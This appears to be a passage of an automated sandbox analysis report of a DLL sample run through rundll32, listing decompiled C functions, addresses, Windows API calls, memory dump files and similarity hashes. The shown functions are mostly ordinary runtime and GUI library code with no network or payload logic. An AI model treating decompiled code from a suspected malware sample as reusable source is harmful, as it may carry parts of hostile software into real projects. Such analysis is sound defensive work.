                                                                                                            0x00000000
                                                                                                            0x1000f439
                                                                                                            0x1000f391
                                                                                                            0x1000f39a
                                                                                                            0x1000f39f
                                                                                                            0x1000f3a2
                                                                                                            0x1000f464
                                                                                                            0x1000f46d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f3a2
                                                                                                            0x1000f46f
                                                                                                            0x1000f46f
                                                                                                            0x1000f37f
                                                                                                            0x1000f473

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1000F39A
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1000F3FF
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1000F444
                                                                                                            • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 1000F46D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
                                                                                                            • Instruction ID: f3d15569573835c18d81f199704cf95a6a2abc57fcee4060fc3bf4c3a8b62e7d
                                                                                                            • Opcode Fuzzy Hash: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
                                                                                                            • Instruction Fuzzy Hash: A9317E30501219FFEB15DF51C881EAF3BA9EF417D0F10806AF9059B619DA70AD80EB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002DB82 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002DB82(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1002276D( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1002D2BC( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10020B71(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                            0x1002db8a
                                                                                                            0x1002db91
                                                                                                            0x1002dba6
                                                                                                            0x00000000
                                                                                                            0x1002db98
                                                                                                            0x1002db9a
                                                                                                            0x1002dbb2
                                                                                                            0x1002dbb7
                                                                                                            0x1002dbba
                                                                                                            0x1002dbbd
                                                                                                            0x1002dbe6
                                                                                                            0x1002dbeb
                                                                                                            0x1002dbef
                                                                                                            0x1002dc70
                                                                                                            0x1002dc82
                                                                                                            0x1002dc8b
                                                                                                            0x1002dc8d
                                                                                                            0x1002dbcd
                                                                                                            0x1002dbcd
                                                                                                            0x1002dbd0
                                                                                                            0x1002dbd2
                                                                                                            0x1002dbd5
                                                                                                            0x1002dbd5
                                                                                                            0x1002dbd5
                                                                                                            0x1002dbd5
                                                                                                            0x00000000
                                                                                                            0x1002dbdb
                                                                                                            0x1002dc4f
                                                                                                            0x1002dc4f
                                                                                                            0x1002dc54
                                                                                                            0x1002dc5a
                                                                                                            0x1002dc5d
                                                                                                            0x1002dc5f
                                                                                                            0x1002dc62
                                                                                                            0x1002dc62
                                                                                                            0x1002dc62
                                                                                                            0x1002dc62
                                                                                                            0x00000000
                                                                                                            0x1002dc66
                                                                                                            0x1002dbf1
                                                                                                            0x1002dbf4
                                                                                                            0x1002dbf4
                                                                                                            0x1002dbfa
                                                                                                            0x1002dbfd
                                                                                                            0x1002dc24
                                                                                                            0x1002dc27
                                                                                                            0x1002dc27
                                                                                                            0x1002dc2d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002dc2f
                                                                                                            0x1002dc32
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002dc34
                                                                                                            0x1002dc34
                                                                                                            0x1002dc37
                                                                                                            0x1002dc37
                                                                                                            0x1002dc3d
                                                                                                            0x1002dbab
                                                                                                            0x1002dbab
                                                                                                            0x1002dc46
                                                                                                            0x00000000
                                                                                                            0x1002dc46
                                                                                                            0x1002dbff
                                                                                                            0x1002dc02
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002dc06
                                                                                                            0x1002dc14
                                                                                                            0x1002dc17
                                                                                                            0x1002dc1d
                                                                                                            0x1002dc1f
                                                                                                            0x1002dc22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002dc22
                                                                                                            0x1002dbbf
                                                                                                            0x1002dbc2
                                                                                                            0x1002dbc4
                                                                                                            0x1002dbca
                                                                                                            0x1002dbca
                                                                                                            0x00000000
                                                                                                            0x1002db9c
                                                                                                            0x1002db9c
                                                                                                            0x1002dba1
                                                                                                            0x1002dba3
                                                                                                            0x1002dba3
                                                                                                            0x00000000
                                                                                                            0x1002dba1
                                                                                                            0x1002db9a

                                                                                                            APIs
                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1002DBB2
                                                                                                            • __isleadbyte_l.LIBCMT ref: 1002DBE6
                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC17
                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                            • String ID:
                                                                                                            • API String ID: 3058430110-0
                                                                                                            • Opcode ID: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
                                                                                                            • Instruction ID: 37aa916cde1404fb766b6052f6d7e43a4bf17a9cf34586f159c1b1eafb0ae636
                                                                                                            • Opcode Fuzzy Hash: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
                                                                                                            • Instruction Fuzzy Hash: 9131F231A0028AEFDB12EF64DC90AAE7BE5FF00351FA285AAE4608B191D370DD40DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016C75 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E10016C75(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E1001FBC4(E10034195, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x10038988;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E1000EC55(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E10004E6E(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E1000FFD3(_t68, _t71, _t77, _t80, __eflags);
					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						E10010292(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E1000FD9F( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E1000E519();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
						E100102E5(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E1000E519();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
					E100102E5(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E1001FC9C(_t53);
			}













                                                                                                            0x10016c75
                                                                                                            0x10016c75
                                                                                                            0x10016c7c
                                                                                                            0x10016c81
                                                                                                            0x10016c83
                                                                                                            0x10016c86
                                                                                                            0x10016c8d
                                                                                                            0x10016c96
                                                                                                            0x10016c99
                                                                                                            0x10016c9c
                                                                                                            0x10016ca1
                                                                                                            0x10016ca6
                                                                                                            0x10016cab
                                                                                                            0x10016caf
                                                                                                            0x10016cb1
                                                                                                            0x10016cb3
                                                                                                            0x10016cb3
                                                                                                            0x10016cb8
                                                                                                            0x10016cbd
                                                                                                            0x10016d00
                                                                                                            0x10016d01
                                                                                                            0x10016d06
                                                                                                            0x10016d08
                                                                                                            0x10016d0b
                                                                                                            0x00000000
                                                                                                            0x10016d0d
                                                                                                            0x10016d0d
                                                                                                            0x10016d10
                                                                                                            0x10016d34
                                                                                                            0x10016d12
                                                                                                            0x10016d1b
                                                                                                            0x10016d1c
                                                                                                            0x10016d1d
                                                                                                            0x10016d1e
                                                                                                            0x10016d1f
                                                                                                            0x10016d22
                                                                                                            0x10016d22
                                                                                                            0x10016d48
                                                                                                            0x10016d56
                                                                                                            0x10016d5b
                                                                                                            0x10016d5e
                                                                                                            0x10016d60
                                                                                                            0x10016d66
                                                                                                            0x10016d62
                                                                                                            0x10016d62
                                                                                                            0x10016d62
                                                                                                            0x10016d69
                                                                                                            0x10016d6c
                                                                                                            0x10016d6e
                                                                                                            0x10016d72
                                                                                                            0x10016d74
                                                                                                            0x10016d77
                                                                                                            0x10016d78
                                                                                                            0x10016d78
                                                                                                            0x10016d7d
                                                                                                            0x10016d84
                                                                                                            0x10016d8b
                                                                                                            0x10016d90
                                                                                                            0x10016d90
                                                                                                            0x10016d90
                                                                                                            0x10016cbf
                                                                                                            0x10016cbf
                                                                                                            0x10016cc2
                                                                                                            0x10016cc6
                                                                                                            0x10016cc8
                                                                                                            0x10016ccb
                                                                                                            0x10016ccc
                                                                                                            0x10016ccc
                                                                                                            0x10016cd1
                                                                                                            0x10016cd8
                                                                                                            0x10016cdf
                                                                                                            0x10016ce4
                                                                                                            0x10016ce4
                                                                                                            0x10016d97

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10016C7C
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • GetDC.USER32(?), ref: 10016CFA
                                                                                                            • IntersectRect.USER32 ref: 10016D34
                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 10016D3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2872313494-0
                                                                                                            • Opcode ID: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
                                                                                                            • Instruction ID: aba366ee442878ba1e0e253a8bcb53805126a2189cb4a44b534bc72d57d8081b
                                                                                                            • Opcode Fuzzy Hash: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
                                                                                                            • Instruction Fuzzy Hash: 45316A75D0026ADFDF02CFA4CD85AAEBBB5FF08340F118096E541AF141D775AA81CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011620 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E10011620(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000EC3C(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000EC09(_t51, _t65, 0, _t77) + 4));
					_t70 = E1001063D(0x10048490);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E10022FC3(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E1001F6F4(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001F631(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001F631(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E10022FC3(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E100069D9();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E10011554( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}





















                                                                                                            0x10011620
                                                                                                            0x10011620
                                                                                                            0x1001162a
                                                                                                            0x1001162c
                                                                                                            0x10011633
                                                                                                            0x1001170b
                                                                                                            0x10011716
                                                                                                            0x10011716
                                                                                                            0x10011639
                                                                                                            0x1001163c
                                                                                                            0x1001163f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011648
                                                                                                            0x1001168c
                                                                                                            0x1001168c
                                                                                                            0x10011692
                                                                                                            0x1001169f
                                                                                                            0x100116a3
                                                                                                            0x1001170a
                                                                                                            0x00000000
                                                                                                            0x100116a9
                                                                                                            0x100116a9
                                                                                                            0x100116ac
                                                                                                            0x100116ae
                                                                                                            0x100116bf
                                                                                                            0x100116c6
                                                                                                            0x100116c8
                                                                                                            0x100116cb
                                                                                                            0x100116cf
                                                                                                            0x100116d1
                                                                                                            0x100116d3
                                                                                                            0x100116d4
                                                                                                            0x100116d9
                                                                                                            0x100116dc
                                                                                                            0x100116df
                                                                                                            0x100116e5
                                                                                                            0x100116ec
                                                                                                            0x100116f4
                                                                                                            0x100116f7
                                                                                                            0x10011707
                                                                                                            0x10011707
                                                                                                            0x100116f7
                                                                                                            0x00000000
                                                                                                            0x100116c6
                                                                                                            0x100116b0
                                                                                                            0x100116bd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100116bd
                                                                                                            0x100116a3
                                                                                                            0x1001164e
                                                                                                            0x10011650
                                                                                                            0x10011657
                                                                                                            0x10011659
                                                                                                            0x1001165c
                                                                                                            0x1001165e
                                                                                                            0x10011662
                                                                                                            0x10011662
                                                                                                            0x1001165e
                                                                                                            0x10011657
                                                                                                            0x10011667
                                                                                                            0x1001166f
                                                                                                            0x10011677
                                                                                                            0x1001167f
                                                                                                            0x10011687
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __msize_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1288803200-0
                                                                                                            • Opcode ID: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
                                                                                                            • Instruction ID: f1eca33ff59634d1dad84df821d0f84545a75b9cee29ec0de7196f6c68877e4a
                                                                                                            • Opcode Fuzzy Hash: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
                                                                                                            • Instruction Fuzzy Hash: F1218F346047019BDB58EF74D881ADA77F6EF45291B11852AF8198F296DB30ECD1CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001EB9E Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E1001EB9E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E1001FBC4(E10034B90, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E1000EC55(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E1000E519();
						}
						L17:
						return E1001FC9C(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E1000E519();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}







                                                                                                            0x1001eb9e
                                                                                                            0x1001eb9e
                                                                                                            0x1001eba5
                                                                                                            0x1001ebb0
                                                                                                            0x1001ebb6
                                                                                                            0x1001ebc3
                                                                                                            0x1001ebc6
                                                                                                            0x1001ec2b
                                                                                                            0x1001ec2b
                                                                                                            0x1001ec2e
                                                                                                            0x1001ec50
                                                                                                            0x1001ec56
                                                                                                            0x1001ec58
                                                                                                            0x1001ec62
                                                                                                            0x1001ec62
                                                                                                            0x1001ec65
                                                                                                            0x1001ec65
                                                                                                            0x1001ec6c
                                                                                                            0x1001ec6e
                                                                                                            0x1001ec71
                                                                                                            0x1001ec72
                                                                                                            0x1001ec72
                                                                                                            0x1001ec7a
                                                                                                            0x1001ec7f
                                                                                                            0x1001ec7f
                                                                                                            0x1001ec30
                                                                                                            0x1001ec30
                                                                                                            0x1001ec34
                                                                                                            0x1001ec37
                                                                                                            0x1001ec39
                                                                                                            0x1001ec3c
                                                                                                            0x1001ec3d
                                                                                                            0x1001ec3d
                                                                                                            0x1001ec42
                                                                                                            0x1001ec44
                                                                                                            0x00000000
                                                                                                            0x1001ec44
                                                                                                            0x1001ebcb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001ebd2
                                                                                                            0x1001ebda
                                                                                                            0x00000000
                                                                                                            0x1001ebe1
                                                                                                            0x1001ebe7
                                                                                                            0x1001ebee
                                                                                                            0x1001ec01
                                                                                                            0x1001ec05
                                                                                                            0x1001ec18
                                                                                                            0x1001ec23
                                                                                                            0x1001ec26
                                                                                                            0x00000000
                                                                                                            0x1001ec26

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 1001EBA5
